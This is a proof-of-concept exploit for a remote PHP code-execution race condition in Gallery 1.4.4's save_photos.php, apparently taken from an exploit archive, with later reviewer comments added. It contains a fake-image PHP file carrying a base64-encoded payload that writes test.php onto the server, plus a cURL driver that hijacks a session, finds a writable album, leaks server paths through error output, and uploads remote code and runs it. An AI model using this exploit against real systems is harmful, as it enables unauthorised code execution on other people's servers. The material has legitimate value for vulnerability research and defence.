
source: https://www.securityfocus.com/bid/10968/info
|
|
|
|
A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.
|
|
|
|
The issue presents itself because the 'set_time_limit' function forces the application to wait 30 seconds before the verification and discarding of non-image files takes place. This allows a window of opportunity for an attacker to execute a malicious script on a server.
|
|
|
|
Gallery 1.4.4 is reported prone to this issue; other versions may be affected as well.
|
|
|
|
This is the content of galfakeimg.php. It has to be placed in a
|
|
remote web directory accessible by the gallery script.
|
|
|
|
---8-<-------------------------8-<-------------------------8<---
|
|
<?php
|
|
echo "<?php
|
|
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcy
|
|
BnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
|
|
?>\n";
|
|
for($x=0;$x<65535;$x++) echo " \n";
|
|
while(1){}
|
|
?>
|
|
---8-<-------------------------8-<-------------------------8<---
|
|
|
|
*/
|
|
|
|
|
|
// --- Driver script (CLI) -----------------------------------------------------
// Reviewer notes, taken only from the requests this script makes:
//  * every step is an HTTP round-trip to the target, so the activity is
//    visible in the web server log as GETs of view_album.php followed by
//    POSTs to save_photos.php whose "urls[]" field carries a URL supplied on
//    the command line;
//  * the path-discovery step parses what looks like rendered PHP warning
//    text ('fopen("' ... 'resource in <b>') out of the HTML reply, so it
//    depends on the server displaying errors; with errors hidden both parsed
//    paths come back empty;
//  * the script aborts itself when the temporary directory is not inside the
//    gallery's web tree (check below "Gallery directory"), so that layout is
//    a precondition of the whole flow.

// Unquoted bareword as the constant name: whether this defines XEC_TIMEOUT
// depends on how the running PHP treats an undefined constant (older versions
// substituted the name as a string and emitted a notice; PHP 8 throws Error).
// XEC_TIMEOUT is only read by send_post() as its cURL timeout.
define( XEC_TIMEOUT, 5);

// Banner. The literal spans several physical lines; the embedded newlines are
// part of the output.
echo "+--------------------------------------------------------------+\n|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
aCiDBiTS acidbits@hotmail.com 17-August-2004
|\n+--------------------------------------------------------------+\n\n";


// Two positional arguments are required; otherwise print usage and exit.
if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo
URL_to_Gallery\n\n");
// Gallery base URL, normalised to end with '/' so paths can be appended.
$host=$argv[2];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
// URL the target will be asked to fetch (argv[1]); only its last path segment
// is reused later as a file name.
$fakephoto=$argv[1];

echo "[+] Obtaining PHPSESSID ... \n ";
// NOTE: $album has not been assigned yet at this point (it is filled by the
// loop further down), so set_albumName is sent empty here. The second argument
// (1) makes get_web() include the response headers, which is where the
// PHPSESSID cookie is expected to appear.
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
// Crude session-id extraction: split on "PHPSESSID=" and keep the text up to
// the next ';'. Nothing checks that the cookie was present at all.
$temp=explode("PHPSESSID=",$webc);
$temp1=explode(";",$temp[1]);
$phps="PHPSESSID=".$temp1[0].";";
echo $phps;

echo "\n\n[+] Getting album names ...\n ";
$webc=get_web($host, 0, $phps);
// Album names are read from every second "set_albumName=" fragment of the
// front page (index is doubled), i.e. it assumes each album link occurs twice.
// The loop condition is a truthiness test: it stops at the first missing or
// empty fragment (an album literally named "0" would end it as well).
$temp=explode("set_albumName=",$webc);
$nalbum=0;
while($temp[($nalbum*2)+1]){
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
$album[$nalbum]=$temp1[0];
echo $album[$nalbum]." ";
$nalbum++;
}
if(!$nalbum) die(" Failed!\n\n");


echo "\n\n[+] Searching an album with permissions to add photos ...";
// Probe each album: select it, POST to save_photos.php, and look for the
// "not allowed" message in the reply. The last album that does not answer
// with that message is kept in $walbum.
$walbum='';
foreach( $album as $temp){
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0, $phps);
// Unlike the two later POSTs, the whole "key=value&key=value" string goes
// through urlencode() here, so '=' and '&' are encoded too.
$webc=send_post( $host."save_photos.php",
urlencode("urls[]=".$host."&setCaption=1"), $phps);
echo "\n ".$temp." -> ";
// ereg() (POSIX regex; deprecated in PHP 5.3, removed in 7.0) is used as a
// plain substring test against the literal text Gallery returns.
if( ereg( "You are no allowed to perform this action", $webc) )
echo "No";
else {
echo "Yes";
$walbum=$temp;
}
}
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
echo "\n Using: ".$walbum;

echo "\n\n[+] Getting gallery & temporal directory paths ...";
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
// Build a 257-character suffix ('/' plus 256 'a') and submit it appended to
// the photo URL; the reply is then mined for filesystem paths.
$temp='/';
for($x=0;$x<256;$x++) $temp.='a';
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1", $phps);
// Temporary directory: text between 'fopen("' and 'photo' in the reply.
// Presumably this is PHP's rendered warning output — if the server does not
// display errors, $temp[1] is unset and $tmpd comes back empty.
$temp=explode("fopen(\"",$webc);
$temp1=explode("photo",$temp[1]);
$tmpd=$temp1[0];
echo "\n Temporal directory: ".$tmpd;
// Gallery directory: text between 'resource in <b>' and 'save_photo'
// (same caveat as above).
$temp=explode("resource in <b>",$webc);
$temp1=explode("save_photo",$temp[1]);
$scrptd=$temp1[0];
echo "\n Gallery directory: ".$scrptd;

// Precondition: the temporary directory must sit under the gallery's own
// directory (i.e. be web-reachable). $scrptd is used unescaped as a POSIX
// regex pattern, so regex metacharacters in the path would alter the test.
if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
gallery's webtree. Can't continue.\n\n" );

// Last path segment of the fake-photo URL (a hand-rolled basename()).
$temp=explode("/",$fakephoto);
end($temp);
$sname=current($temp);
echo "\n\n[+] Uploading $sname and executing it ...";
// send_post() returns once its cURL timeout (XEC_TIMEOUT seconds) elapses,
// whether or not the server has finished with the request.
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
// Request "photo.<name>" from the temporary directory, turned into a URL by
// stripping the gallery directory prefix from $tmpd. get_web() sets no cURL
// timeout, so this call blocks for as long as the server takes to answer.
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,
$phps);

// The final location is only printed; this script does not request it.
echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\//||\\\\\n\n");
|
|
|
|
|
|
/**
 * Issue a GET request through cURL and return the raw response text.
 *
 * @param string $url    Absolute URL to fetch.
 * @param int    $h      Value for CURLOPT_HEADER: non-zero prepends the
 *                       response headers to the returned text.
 * @param string $cookie Raw Cookie header value ('' for none).
 * @return string|false  Response text, or false when the transfer fails;
 *                       no error check is made here, callers receive the
 *                       false as-is.
 *
 * Note: unlike send_post(), no CURLOPT_TIMEOUT is set, so a server that
 * never answers blocks this call indefinitely.
 */
function get_web($url, $h, $cookie)
{
    // Options are applied in this order. CURLOPT_RETURNTRANSFER makes
    // curl_exec() return the transfer instead of printing it.
    $options = array(
        CURLOPT_URL            => $url,
        CURLOPT_HEADER         => $h,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_COOKIE         => $cookie,
    );

    $handle = curl_init();
    foreach ($options as $option => $value) {
        curl_setopt($handle, $option, $value);
    }
    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
|
|
|
|
/**
 * Issue a POST request through cURL and return the response body.
 *
 * @param string       $url    Absolute URL to post to.
 * @param string|array $data   Value for CURLOPT_POSTFIELDS; the callers in
 *                             this file pass a pre-encoded form string.
 * @param string       $cookie Raw Cookie header value.
 * @return string|false  Response body (headers excluded), or false when the
 *                       transfer fails or times out — callers do not check.
 *
 * The transfer is capped at XEC_TIMEOUT seconds (file-level constant); once
 * the cap is hit curl_exec() gives up regardless of what the server has done
 * so far.
 */
function send_post($url, $data, $cookie)
{
    $handle = curl_init();

    // Options are applied in this order.
    $options = array(
        CURLOPT_URL            => $url,
        CURLOPT_HEADER         => 0,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_POST           => 1,
        CURLOPT_POSTFIELDS     => $data,
        CURLOPT_COOKIE         => $cookie,
        CURLOPT_TIMEOUT        => XEC_TIMEOUT,
    );
    foreach ($options as $option => $value) {
        curl_setopt($handle, $option, $value);
    }

    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
|